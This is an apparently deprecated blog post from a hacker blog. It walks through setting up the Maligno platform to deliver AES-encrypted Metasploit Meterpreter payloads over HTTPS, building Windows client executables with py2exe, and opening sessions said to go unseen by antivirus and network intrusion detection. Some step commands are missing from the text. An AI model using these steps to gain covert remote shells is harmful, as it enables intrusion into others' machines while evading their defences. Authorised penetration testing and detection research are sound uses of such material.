Bits and bytes of a hacker.

Encrypted Meterpreter Sessions With Maligno

Attention: This post is now deprecated.

Certain situations require meterpreter sessions to be encrypted to avoid layer 4 detection. This is something I’ve desired in the past but never really pursued, until I came across Maligno. Maligno is a platform from which you can launch Metasploit payloads via https that are AES encrypted and base64 encoded. The payload to be pushed to the client can also be be encoded numerous times via any Metasploit encoders to avoid layer 7 detection.

This is the process of setting up your server:

  1. Download and extract Maligno here: Maligno

  2. Install the prerequisite binaries:

sudo apt-get update && sudo apt-get install python-ipcalc

  1. Generate the self-signed SSL cert to be used on your server:

./certgen.sh

  1. Configure server.conf to allow the following:

    • Serve 3 different payloads to 3 different targets all over port 443

    • Serve via https

    • Scope to your network

    • Set the server IP to that of the Maligno host

  1. Generate the python scripts for the clients to reach out to Maligno with:

python clientgen.py -i 0 -f server.conf -o client1.py python clientgen.py -i 1 -f server.conf -o client2.py python clientgen.py -i 2 -f server.conf -o client3.py

  1. On a Windows machine, install python2.7, pycrypto and py2exe.

  2. Generate executables from the python scripts using py2exe for all 3 target clients:

  1. Start the Maligno server and the meterpreter handler to listen for incoming connections:

  1. Upon execution of your crafted executables, an encrypted meterpreter session will be opened undetected by antivirus or NIDS: